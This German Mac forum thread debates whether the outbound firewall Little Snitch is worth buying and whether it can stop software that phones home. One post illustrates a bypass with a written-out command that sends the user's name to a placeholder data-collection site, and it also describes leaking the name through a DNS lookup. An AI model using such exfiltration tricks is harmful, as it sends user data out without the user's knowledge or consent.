Alternative zu Little Snitch?

Status
Für weitere Antworten geschlossen.

circlepit

Mitglied
Thread Starter
Dabei seit
23.08.2005
Beiträge
41
Reaktionspunkte
5
hallo,

ich bin auf der suche nach einer "programm-firewall" die ähnlich wie little snitch arbeitet. möglichst als freeware.

danke im voraus

circlepit
 
Little Snitch ist jeden Cent Wert. Die paar Euro werden doch wohl drin sein, oder? Zumal es wohl nichts Vergleichbares gibt.
 
Ich glaube auch, dass man da nichts Gleichwertiges als Freeware findet.
 
Vor allem bei dem Dollarkurs derzeit ;)
Also billiger bekommt man es wohl kaum ;)
 
ich bin auf der suche nach einer "programm-firewall" die ähnlich wie little snitch arbeitet. möglichst als freeware.
Ich würde es mit BRAIN 1.0 versuchen. Dann spart man sich zusätzliche Software. Wenn du einfach keine Software installierst der du nicht vertrauen kannst, dann erübrigt sich LS. Abgesehen davon dass es eh nicht das leisten kann was es verspricht.
 
Ich würde es mit BRAIN 1.0 versuchen. Dann spart man sich zusätzliche Software. Wenn du einfach keine Software installierst der du nicht vertrauen kannst, dann erübrigt sich LS.

Wenn es so einfach wäre. Man muss sich nur mal anschauen, was für ein reger Netzwerkverkehr bei den meisten Widgets stattfindet, und das z.T. völlig unnötig. Ich weiß z.B. nicht, wozu es gut sein soll, dass iStat sich bei jeder Nutzung mit seinem Heimatserver islayer.com verbinden muss.

Wenn man das per Little Snitch abstellt, funktioniert iStat auch ganz ohne nach Hause zu telefonieren.
 
gibt es von little snitch eigentlich inzwischen eine Version auf Deutsch ?
 
Wenn man das per Little Snitch abstellt, funktioniert iStat auch ganz ohne nach Hause zu telefonieren.
Der Punkt ist das solche Software gar nicht erst installiert gehört!
wenn du sie erst installierst, vermutlich auch noch mit admin-Rechten, dann ist es eh zu spät. Dann KANN LS nichts mehr verhindern.
 
Der Punkt ist das solche Software gar nicht erst installiert gehört!

iStat ist zu Recht eins der beliebtesten Widgets, welches mir als Programm ganz ausgezeichnet gefällt.Wenn du keine Software mehr installieren möchtest, die nach Hause telefonieren will, wirst ziemlich nackt dastehen, sogar die Apple-Software ist diesbezüglich ziemlich aktiv. Außerdem stellt sich natürlich die Frage, wie du das überhaupt ohne Firewall herausfinden willst, ob eine Software unauthorisiert Kontakt mit dem Internet aufnimmt.

dann ist es eh zu spät. Dann KANN LS nichts mehr verhindern.

Es ist keinesweg zu spät. Ich sag ja : LS verhindert das Nach-Hause-Telefonieren effektiv bzw. gibt einem zumindest die Kontrolle darüber.
 
iStat ist zu Recht eins der beliebtesten Widgets, welches mir als Programm ganz ausgezeichnet gefällt.Wenn du keine Software mehr installieren möchtest, die nach Hause telefonieren will, wirst ziemlich nackt dastehen, sogar die Apple-Software ist diesbezüglich ziemlich aktiv.
Wenn man sogar apple als OS-Hersteller misstraut is eh alles zu Spät.
Wer das Betriebssystem kontrolliert, der kontrolliert den Rechner. Und ja, ein Betriebssystem das Sachen macht wie "nach hause telefonieren" ohne dass ich das beeinflussen kann, das kontrolliere ich offensichtlich nicht.

Außerdem stellt sich natürlich die Frage, wie du das überhaupt ohne Firewall herausfinden willst, ob eine Software unauthorisiert Kontakt mit dem Internet aufnimmt.
Eine firewall soll verhindern dass sich solche Schadsoftware überhaupt installiert. Danach ist es eh zu spät, da um Schadsoftware zu installieren eine Sicherheitslücke genutzt werden muss.

Es ist keinesweg zu spät. Ich sag ja : LS verhindert das Nach-Hause-Telefonieren effektiv bzw. gibt einem zumindest die Kontrolle darüber.
Sobald du als admin eine Sofware installierst ist diese grundsätzlich in der Lage LS an seine Bedürfnisse anzupassen. Du hast aus dem laufenden System keine, wirklich gar keine Möglichkeit dies zu verhindern.
  1. Jede Software die mit dem Selben Rechtestatus läuft kann natürlich LS beeinflussen.
  2. Ein Programm muss doch nur "firefox http://datensamelseite?$USER" als Befehl abschicken. Von mir aus auch ein anderes Tool. Alternativ kann es auch einfach den DNS fragen wie denn die IP von $USER.datensammelseite lautet. Schon hab ich deinen Usernamen.
  3. Nur weil ein Fenster aufpoppt "Ich bin böse und will ins INET" bedeutet das noch lange nicht das es stimmt. Es könnte ein falscher Alarm sein.
  4. Wenn kein solches Fenster aufpoppt bedeuetet es aber auch nicht dass es kein böses programm gibt, es bedeutet nur das die "FIREWALL" es nicht entdeckt hat.

LS ist keinen Cent wert.

EDIT: Es gibt übrigens Terrabytewiese Software welche KEINE schädlichen Eigenschaften wie anscheinend z.B. iStat hat! Man muss sich nur vorher schlau machen, nicht alles installieren was einem schön Bunt angepriesen wird und BRAIN 1.0 einschalten
 
Du vermengst da was. Nicht jede Software, die nach Hause telefoniert, ist deshalb gleich Schadsoftware. Im Gegenteil; man muss davon ausgehen, dass heutzutage mehr als die Hälfte der Bezahlsoftware, aber natürlich insbesondere auch Freeware, Online-Funktionen irgendwelcher Art enthält, die auch ungefragt aktiv werden. Solche Software schaltet natürlich keine Firewall wie LS ab, weil das eine strafbare Handlung wäre und das den Software-Vertreiber eine Menge Geld kosten würde, wenn dann die Schadensersatzforderungen kommen. Das wird sich niemand leisten wollen; von dem Imageschaden mal ganz abgesehen. Richtig ist, dass solche Desktop-Firewalls keine brauchbare Maßnahme gegen echte Trojaner sind, weil es sehr leicht ist, den Firewall-Prozess abzuschiessen und alle Immunisierungstechnologien ala Zone Alarm und Co münden nur in einem nicht endenden Hase-und Igel-Spiel mit der möglichen Nebenwirkung für den Benutzer, dass er seinen Rechner nicht mehr kontrollieren kann, weil ihn die Immunisierung der Firewall daran hindert.

Insofern ist Little Snitch genau das richtige Programm, welches - wie sein Name sagt - Verbindungsversuche "normaler" Software verpetzt.
 
Zuletzt bearbeitet:
Wieso funkt der Taschenrechner nach draußen?
Für den regelmäßigen Abgleich von 1+1=2 ?
 
Du vermengst da was. Nicht jede Software, die nach Hause telefoniert, ist deshalb gleich Schadsoftware.
Das ist Ansichtsache. Mir kommt auf jeden Fall keine Software auf die Rechner die so etwas macht. Zumindest bei meinen privaten Rechnern ist so ein Verhalten ein "nogo".

Solche Software schaltet natürlich keine Firewall wie LS ab, weil das eine strafbare Handlung wäre und das den Software-Vertreiber eine Menge Geld kosten würde, wenn dann die Schadensersatzforderungen kommen.
Ach ja? was ist daran Strafbar? LS macht ja nix anderes.

Insofern ist Little Snitch genau das richtige Programm, welches - wie sein Name sagt - Verbindungsversuche "normaler" Software verpetzt.
Naja, jedem das seine. Anzuerkennen das LS bei "böser" Software nix bringt und im selben Atemzug dann zu behaupten das LS bei "guter" Software mit "bösen" Absichten hilft ist schon etwas seltsam. Ich würde es als blindes Vertrauen bezeichnen und das hat in Sicherheitsfragen einfach nichts zu suchen.
 
Wieso funkt der Taschenrechner nach draußen?
Wenn einen solch ein Verhalten stört, wieso installiert man dann diese Softeware? :nono:
Irgendwie sind die meissten in diesem Land schon sehr abgestumpft was Datenschutz usw angeht.
 
Wenn einen solch ein Verhalten stört, wieso installiert man dann diese Softeware? :nono:
Irgendwie sind die meissten in diesem Land schon sehr abgestumpft was Datenschutz usw angeht.

Den Rechner hast du auch installiert. ;)
 
magheinz hat den sichersten Rechner schlechthin dank Brain 1.0:
keine Programme, kein Betriebssystem, bombensicher, die Sache. :hehehe:
 
  • Gefällt mir
Reaktionen: HerrSchnuff
Wenn man alles nur unter dem User installiert, dann kann LS aber schon die Verbindungen effektiv unterdrücken, oder?
Hab ich das richtig verstanden?
 
Status
Für weitere Antworten geschlossen.
Zurück
Oben Unten